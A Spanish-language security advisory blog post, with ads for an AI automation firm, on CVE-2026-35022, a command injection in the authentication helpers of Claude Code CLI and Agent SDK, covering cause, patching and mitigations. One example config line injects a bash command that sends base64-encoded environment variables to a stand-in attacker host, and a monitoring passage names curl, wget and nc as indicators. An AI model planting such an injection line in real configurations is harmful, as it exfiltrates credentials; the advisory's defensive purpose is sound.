La vulnerabilidad CVE-2026-35022 vulnerabilidad inyección comandos Claude Code CLI representa una amenaza crítica para los entornos de desarrollo e integración continua (CI/CD) que utilizan las herramientas de automatización de Anthropic. Con una puntuación CVSS de 9.8, este fallo permite a un atacante remoto ejecutar comandos arbitrarios en el sistema operativo subyacente sin necesidad de autenticación, comprometiendo potencialmente credenciales y variables de entorno sensibles.
| CVE ID | CVE-2026-35022 |
| Severidad (CVSS) | 9.8 – CRÍTICA |
| Vector CVSS | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Productos afectados | Anthropic Claude Code CLI y Claude Agent SDK |
| Exploit público | No |
| Fecha publicación | 2026-04-06 |
Puntos clave del análisis: CVE-2026-35022 vulnerabilidad inyección comandos Claude Code CLI es clave para entender el alcance de esta amenaza.
- Vulnerabilidad de inyección de comandos del sistema operativo (OS Command Injection) en los ayudantes de autenticación.
- No requiere autenticación y es explotable de forma remota (Network Attack Vector).
- Parámetros de configuración como
apiKeyHelper,awsAuthRefresh,awsCredentialExportygcpAuthRefreshson los vectores de entrada. - Permite la ejecución de código con los privilegios del usuario o entorno de automatización, llevando al robo de credenciales y a la exfiltración de variables de entorno.
- Afecta directamente a la seguridad de las canalizaciones de CI/CD que integran estas herramientas.
¿Qué es CVE-2026-35022 vulnerabilidad inyección comandos Claude Code CLI y por qué es relevante?
Sistemas y versiones afectadas por la inyección de comandos
🤖 ¿Tu empresa ya automatiza con Inteligencia Artificial? En Iberia Intelligence diseñamos e implementamos agentes de IA y flujos de automatización a medida: desde la integración de LLMs en procesos internos hasta la orquestación de agentes autónomos que reducen costes operativos y liberan a tu equipo para tareas de mayor valor.
La vulnerabilidad CVE-2026-35022 se localiza en componentes específicos de las herramientas de desarrollo y automatización de Anthropic. Según el análisis de las referencias oficiales, el fallo reside en cómo se ejecutan los ayudantes de autenticación configurados por el usuario. Cuando estos ayudantes se invocan con el parámetro shell=True en Python (o su equivalente), los valores de configuración proporcionados por un atacante pueden incluir metacaracteres de shell (como ;, &&, |, $()) que se interpretan y ejecutan.
Esto significa que cualquier instalación que utilice las funciones vulnerables para gestionar credenciales de APIs cloud (AWS, GCP) o claves de API está en riesgo. El contexto típico de explotación sería un entorno de CI/CD donde estas herramientas se emplean para automatizar despliegues o interacciones con modelos de lenguaje.
| Producto | Versiones vulnerables | Versión parcheada |
|---|---|---|
| Anthropic Claude Code CLI | Todas las versiones anteriores a la corrección | Consultar los anuncios oficiales de Anthropic para la versión actualizada. |
| Anthropic Claude Agent SDK | Todas las versiones anteriores a la corrección | Consultar los repositorios oficiales (pip, GitHub) para la versión parcheada. |
Es crucial verificar si vuestras canalizaciones de integración o despliegue incluyen scripts o configuraciones que llamen a estos ayudantes. La falta de validación de entrada en estos puntos concretos convierte una funcionalidad legítima en una puerta trasera de alto impacto.
Mecanismo de explotación de la inyección de comandos
El núcleo del problema técnico es el uso inseguro de funciones como subprocess.run() o os.system() en Python con el parámetro shell=True. En un flujo normal, un ayudante de autenticación (por ejemplo, awsCredentialExport) ejecuta un comando predefinido para obtener credenciales. Un atacante que pueda modificar la configuración de estos ayudantes –ya sea a través de variables de entorno, archivos de configuración manipulados, o entradas de API– puede inyectar un comando arbitrario.
Imaginad un escenario donde un archivo de configuración claude_config.yaml es comprometido o generado dinámicamente con datos no confiables:
authentication:
awsCredentialExport: "/usr/bin/bash -c 'curl https://atacante.com/exfil?token=$(env | base64)'"
Cuando la CLI o el SDK intenten ejecutar este ayudante, el shell interpretará toda la cadena, ejecutando el comando curl malicioso y enviando todas las variables de entorno (que pueden contener secretos) a un servidor controlado por el atacante. Esta es la esencia de la vulnerabilidad CVE-2026-35022.
Cómo parchear CVE-2026-35022: guía paso a paso
La remediación principal para la vulnerabilidad CVE-2026-35022 consiste en actualizar a las versiones parcheadas de las herramientas afectadas. Anthropic ha debido lanzar correcciones que eliminan el uso de shell=True o implementan una validación y sanitización estricta de los valores de configuración antes de pasarlos a cualquier proceso de shell.
Os proporcionamos una guía de acciones concretas para asegurar vuestros entornos:
Paso 1: Identificación y inventario
En primer lugar, auditad todos vuestros entornos de desarrollo, staging y producción para detectar el uso de Anthropic Claude Code CLI o Claude Agent SDK. Podéis utilizar comandos como pip list o revisar los archivos de requisitos (requirements.txt, pyproject.toml) de vuestros proyectos.
# Ejemplo para verificar la instalación de Claude Agent SDK
pip list | grep -i claude
# O buscar en proyectos Python
grep -r "anthropic\|claude" ./ --include="*.py" --include="requirements*.txt"
Paso 2: Actualización a la versión corregida
Una vez identificados, proceded a la actualización. Dado que no se especifica un número de versión concreto en los datos del NVD, debéis consultar los canales oficiales de Anthropic. Lo más probable es que la actualización se realice a través del gestor de paquetes de Python, pip.
# Actualización genérica del SDK (aseguraos de tener los índices actualizados)
pip install --upgrade anthropic-claude-agent-sdk
# Para la CLI, verificad el método de instalación original (pip, curl, etc.)
# y repetid el proceso con la última versión estable publicada tras el 6 de abril de 2026.
Paso 3: Verificación post-actualización
No asumáis que la actualización ha sido exitosa por defecto. Verificad la versión instalada y, si es posible, revisad el código fuente de los módulos actualizados para confirmar que las llamadas a subprocesos ya no usan shell=True de forma insegura.
Verificación de que el parche se ha aplicado correctamente
Tras actualizar, realizad una comprobación proactiva. Podéis crear un test de concepto controlado en un entorno aislado (como un contenedor Docker) que intente explotar la vulnerabilidad. Si el parche es efectivo, cualquier intento de inyección mediante metacaracteres debería fallar o ser sanitizado (por ejemplo, los caracteres especiales deberían escaparse y tratarse como literal, no como comando). Además, revisad los logs de vuestras aplicaciones en busca de errores relacionados con la ejecución de ayudantes que puedan indicar comportamientos inesperados tras la actualización.
Medidas adicionales de mitigación y workarounds
Si por alguna razón no podéis aplicar el parche de inmediato (por ejemplo, dependencias críticas o procesos de validación largos), es imprescindible implementar medidas de mitigación que reduzcan la superficie de ataque. La naturaleza de la vulnerabilidad CVE-2026-35022 obliga a un enfoque defensivo en capas.
Workaround 1: Restricción y auditoría de configuraciones
Revisad y bloquead cualquier posibilidad de que los valores de configuración de los ayudantes de autenticación sean definidos por entradas externas no confiables. Aseguraos de que archivos como claude_config.yaml o variables de entorno relacionadas (ej. ANTHROPIC_API_KEY_HELPER) estén protegidos con permisos estrictos (solo lectura para el usuario que ejecuta la aplicación) y su contenido sea estático y predefinido por un administrador.
Workaround 2: Ejecución con privilegios mínimos
Nunca ejecutéis la CLI o los scripts que usen el SDK con privilegios de root o administrador. Utilizad un usuario dedicado con permisos restringidos solo a los recursos estrictamente necesarios. Esto limita el daño potencial si se produce una explotación, confinando al atacante a un entorno con capacidades reducidas.
Workaround 3: Contención mediante contenedores o sandboxing
Una medida avanzada pero muy efectiva es ejecutar estas herramientas dentro de contenedores Docker o entornos sandbox (como gVisor, Firecracker) con un perfil de seguridad restringido. Podéis definir políticas de seccomp para bloquear llamadas al sistema peligrosas (como execve para nuevos procesos) y limitar el acceso a la red solo a los endpoints estrictamente necesarios (ej. la API de Anthropic, vuestros servicios cloud).
# Ejemplo de Dockerfile con usuario no privilegiado
FROM python:3.11-slim
RUN useradd -m -u 1000 claudeuser
USER claudeuser
COPY --chown=claudeuser . /app
WORKDIR /app
RUN pip install --no-cache-dir anthropic-claude-agent-sdk==[VERSION_PARCHADA]
# ... resto de la configuración
Workaround 4: Monitorización y detección
Implementad reglas de monitorización en vuestros sistemas de SIEM o de logs que alerten sobre la ejecución de procesos inusuales desde el contexto de vuestras aplicaciones que usan Claude. Buscad patrones como la creación de shells (/bin/bash, /bin/sh) o la ejecución de comandos como curl, wget, o nc desde estos procesos, lo cual sería un indicador de compromiso fuerte.
- Confirmad que la versión instalada de Claude Code CLI o Agent SDK es posterior a la fecha de publicación del parche (6 de abril de 2026).
- Auditad todos los archivos de configuración y variables de entorno para asegurar que no contienen metacaracteres de shell en los valores de los ayudantes.
- Realizad una prueba de funcionalidad básica (ej. una llamada a la API) para verificar que la actualización no ha roto funcionalidades críticas.
- Consultad la referencia oficial en el NVD (CVE-2026-35022) y los anuncios de Anthropic para posibles actualizaciones o workarounds adicionales.
Como analistas de ciberinteligencia, observamos que vulnerabilidades de inyección en herramientas de desarrollo y CI/CD son especialmente peligrosas porque atacan el corazón de la cadena de suministro de software. La CVE-2026-35022 no es un fallo aislado, sino un recordatorio de la necesidad de revisar continuamente la seguridad de las herramientas de automatización que, con privilegios elevados, manejan los secretos más sensibles de nuestra infraestructura. La remediación inmediata no es opcional; es una obligación para cualquier equipo que valore la integridad de sus entornos y datos.
Referencias y recursos oficiales
- NVD – CVE-2026-35022 — Base de datos nacional de vulnerabilidades (NIST)
- Referencia: phoenix.security
- Referencia: vulncheck.com
Recursos y fuentes oficiales:
Automatiza tu empresa con Agentes de IA — diseño e implementación a medida
En Iberia Intelligence construimos agentes de IA y workflows de automatización adaptados a tu negocio: análisis de procesos, selección de herramientas, integración y formación del equipo. Resultados medibles desde el primer mes.